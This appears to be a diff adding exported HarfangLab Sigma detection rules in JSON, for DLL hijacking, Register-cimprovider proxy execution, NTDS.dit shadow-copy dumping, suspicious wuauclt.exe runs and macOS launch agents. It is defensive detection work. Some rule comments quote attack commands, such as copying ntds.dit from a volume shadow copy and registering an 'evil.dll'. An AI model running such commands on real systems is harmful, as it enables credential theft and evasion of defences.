'\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "070c26de-9c37-4449-81eb-9d5f6a91c83b",
+ "rule_name": "DLL Hijacking via musnotificationux.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via musnotificationux.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "072eb6a2-64bf-4b66-86f2-77e8e429ef63",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.586156Z",
+ "creation_date": "2026-03-23T11:45:34.586174Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.586191Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_auditpol.yml",
+ "content": "title: DLL Hijacking via auditpol.exe\nid: 072eb6a2-64bf-4b66-86f2-77e8e429ef63\ndescription: |\n Detects potential Windows DLL Hijacking via auditpol.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'auditpol.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\auditpolcore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "072eb6a2-64bf-4b66-86f2-77e8e429ef63",
+ "rule_name": "DLL Hijacking via auditpol.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via auditpol.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "073992cd-3d71-4560-89eb-235eb6cfdf65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.086864Z",
+ "creation_date": "2026-03-23T11:45:34.086867Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.086881Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/",
+ "https://twitter.com/PhilipTsukerman/status/992021361106268161",
+ "https://attack.mitre.org/techniques/T1218/"
+ ],
+ "name": "t1218_register_cimprovider.yml",
+ "content": "title: Suspicious Proxy Execution via Register-cimprovider.exe\nid: 073992cd-3d71-4560-89eb-235eb6cfdf65\ndescription: |\n Detects the use of Register-cimprovider.exe which is used to register new WMI providers to proxy execution of malicious code.\n This binary, which is digitally signed by Microsoft, can be used to execute malicious DLLs.\n Attackers may abused it to bypass security restrictions.\n It is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the Register-CimProvider process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/\n - https://twitter.com/PhilipTsukerman/status/992021361106268161\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/03/01\nmodified: 2025/06/26\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.RegisterCimProvider\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\Register-cimprovider.exe'\n - OriginalFileName: 'Register-CimProvider2.exe'\n\n selection_command:\n # C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path C:\\AtomicRedTeam\\atomics\\T1218\\src\\Win32\\T1218-2.dll\n # Register-cimprovider -path \"C:\\folder\\evil.dll\"\n CommandLine|contains|all:\n - ' -path '\n - '.dll'\n\n exclusion_programfiles:\n CommandLine|contains:\n - ' -Path ?:\\Program Files\\'\n - ' -Path ?:\\Program Files (x86)\\'\n\n # https://learn.microsoft.com/fr-fr/troubleshoot/mem/configmgr/endpoint-protection/configmgr-console-shows-out-of-date-values\n exclusion_protectionmanagement:\n CommandLine|contains|all:\n - '-ProviderName ProtectionManagement -Namespace root\\Microsoft\\protectionmanagement -Path'\n - '\\ProtectionManagement.dll'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "073992cd-3d71-4560-89eb-235eb6cfdf65",
+ "rule_name": "Suspicious Proxy Execution via Register-cimprovider.exe",
+ "rule_description": "Detects the use of Register-cimprovider.exe which is used to register new WMI providers to proxy execution of malicious code.\nThis binary, which is digitally signed by Microsoft, can be used to execute malicious DLLs.\nAttackers may abused it to bypass security restrictions.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the Register-CimProvider process.\n",
+ "rule_creation_date": "2022-03-01",
+ "rule_modified_date": "2025-06-26",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1218"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "074c0895-1c28-4998-833c-644cd8fa5ff0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.094771Z",
+ "creation_date": "2026-03-23T11:45:34.094773Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.094777Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1003/003/",
+ "https://attack.mitre.org/techniques/T1006/"
+ ],
+ "name": "t1003_003_powershell_ntds_shadow_copy.yml",
+ "content": "title: NTDS Dumped from a Volume Shadow Copy via PowerShell\nid: 074c0895-1c28-4998-833c-644cd8fa5ff0\ndescription: |\n Detects a copy of the ntds.dit file from a Volume Shadow Copy with PowerShell in interactive mode.\n Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.\n It is recommended to investigate the PowerShell command as well as other malicious commands executed on the domain controller to determine legitimacy.\nreferences:\n - https://attack.mitre.org/techniques/T1003/003/\n - https://attack.mitre.org/techniques/T1006/\ndate: 2022/05/10\nmodified: 2025/09/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.003\n - attack.t1078\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n # copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\shadowcopy\n PowershellCommand|contains|all:\n - 'copy '\n - 'GLOBALROOT'\n - 'HarddiskVolumeShadowCopy'\n - 'ntds.dit'\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "074c0895-1c28-4998-833c-644cd8fa5ff0",
+ "rule_name": "NTDS Dumped from a Volume Shadow Copy via PowerShell",
+ "rule_description": "Detects a copy of the ntds.dit file from a Volume Shadow Copy with PowerShell in interactive mode.\nAdversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.\nIt is recommended to investigate the PowerShell command as well as other malicious commands executed on the domain controller to determine legitimacy.\n",
+ "rule_creation_date": "2022-05-10",
+ "rule_modified_date": "2025-09-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.credential_access",
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1003.003",
+ "attack.t1006",
+ "attack.t1078"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "07c550a4-29ed-429b-8c3a-f6b59266b530",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.593517Z",
+ "creation_date": "2026-03-23T11:45:34.593520Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.593528Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://github.com/xforcered/WFH",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_sppextcomobj.yml",
+ "content": "title: DLL Hijacking via sppextcomobj.exe\nid: 07c550a4-29ed-429b-8c3a-f6b59266b530\ndescription: |\n Detects potential Windows DLL Hijacking via sppextcomobj.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sppextcomobj.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\adsldpc.dll'\n - '\\CRYPTBASE.dll'\n - '\\DNSAPI.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "07c550a4-29ed-429b-8c3a-f6b59266b530",
+ "rule_name": "DLL Hijacking via sppextcomobj.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via sppextcomobj.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "07ddc2b1-4842-43eb-92d7-df872335fcf9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.098449Z",
+ "creation_date": "2026-03-23T11:45:34.098451Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.098455Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_adobe_licensing.yml",
+ "content": "title: DLL Hijacking via adobe_licensing_wf_helper.exe\nid: 07ddc2b1-4842-43eb-92d7-df872335fcf9\ndescription: |\n Detects potential Windows DLL Hijacking via Visual Studio adobe_licensing_wf_helper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate signed executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'adobe_licensing_wf_helper.exe'\n ProcessSignature: 'Adobe Inc.'\n ImageLoaded|endswith: '\\libcef.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Common Files\\Adobe\\'\n - '?:\\Program Files (x86)\\Adobe\\'\n - '?:\\Program Files\\Adobe\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Common Files\\Adobe\\'\n - '?:\\Program Files (x86)\\Adobe\\'\n - '?:\\Program Files\\Adobe\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "07ddc2b1-4842-43eb-92d7-df872335fcf9",
+ "rule_name": "DLL Hijacking via adobe_licensing_wf_helper.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via Visual Studio adobe_licensing_wf_helper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate signed executable to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2022-12-15",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "081076fd-302d-429b-88c3-9339633fee72",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.070904Z",
+ "creation_date": "2026-03-23T11:45:34.070906Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.070910Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b",
+ "https://redcanary.com/blog/blackbyte-ransomware/",
+ "https://attack.mitre.org/techniques/T1055/",
+ "https://attack.mitre.org/software/S0154/"
+ ],
+ "name": "t1055_suspicious_process_wuauclt.yml",
+ "content": "title: Suspicious wuauclt.exe Execution\nid: 081076fd-302d-429b-88c3-9339633fee72\ndescription: |\n Detects the execution of legitimate Windows Update Client (wuauclt.exe) Windows binary in a suspicious context.\n This can be the result of Cobalt Strike's exploitation via the spawnto setting to launch temporary jobs through this legitimate binary.\n It is recommended to analyze the newly created process and its parents for suspicious behavior or content.\nreferences:\n - https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b\n - https://redcanary.com/blog/blackbyte-ransomware/\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/software/S0154/\ndate: 2022/01/25\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.s0154\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\wuauclt.exe'\n - OriginalFileName: 'wuauclt.exe'\n\n selection_existing_parent:\n ParentImage|contains: '\\'\n\n filter_parameters:\n # Command-line with no parameters\n CommandLine|contains: ' '\n\n filter_parentcommandline:\n ParentCommandLine:\n - '?:\\Windows\\System32\\mousocoreworker.exe -Embedding'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wuauserv'\n - '?:\\Windows\\system32\\svchost.exe -k wuausvcs'\n - '?:\\Windows\\system32\\svchost.exe -k bitfsvcs'\n\n exclusion_explorer:\n ParentImage: '?:\\Windows\\explorer.exe'\n GrandparentImage:\n - '?:\\Windows\\System32\\userinit.exe'\n - '?:\\Windows\\System32\\winlogon.exe'\n\n exclusion_command:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage:\n - '?:\\Windows\\System32\\userinit.exe'\n - '?:\\Windows\\explorer.exe'\n\n exclusion_sihost1:\n ParentImage: '?:\\Windows\\System32\\sihost.exe'\n GrandparentCommandLine:\n - '?:\\windows\\System32\\svchost.exe -k netsvcs'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -p'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -s UserManager'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s UserManager'\n\n exclusion_sihost2:\n Ancestors|contains: '?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\sihost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "081076fd-302d-429b-88c3-9339633fee72",
+ "rule_name": "Suspicious wuauclt.exe Execution",
+ "rule_description": "Detects the execution of legitimate Windows Update Client (wuauclt.exe) Windows binary in a suspicious context.\nThis can be the result of Cobalt Strike's exploitation via the spawnto setting to launch temporary jobs through this legitimate binary.\nIt is recommended to analyze the newly created process and its parents for suspicious behavior or content.\n",
+ "rule_creation_date": "2022-01-25",
+ "rule_modified_date": "2025-02-14",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1055"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "08393432-4fef-4e8b-aa5e-fc13131e09c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.093364Z",
+ "creation_date": "2026-03-23T11:45:34.093366Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.093370Z",
+ "rule_level": "medium",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1543/001/",
+ "https://attack.mitre.org/techniques/T1543/004/"
+ ],
+ "name": "t1543_001_launch_agents_created_plistbuddy.yml",
+ "content": "title: Launch Agent/Daemon Created via PlistBuddy\nid: 08393432-4fef-4e8b-aa5e-fc13131e09c3\ndescription: |\n Detects the creation of a launch agent or daemon using PlistBuddy.\n Adversaries may build a plist from scratch using PlistBuddy in order to establish a means of persistence.\n It is recommended to check the content of the newly created plist file for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1543/001/\n - https://attack.mitre.org/techniques/T1543/004/\ndate: 2024/06/18\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.001\n - attack.t1543.004\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Tool.PlistBuddy\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n 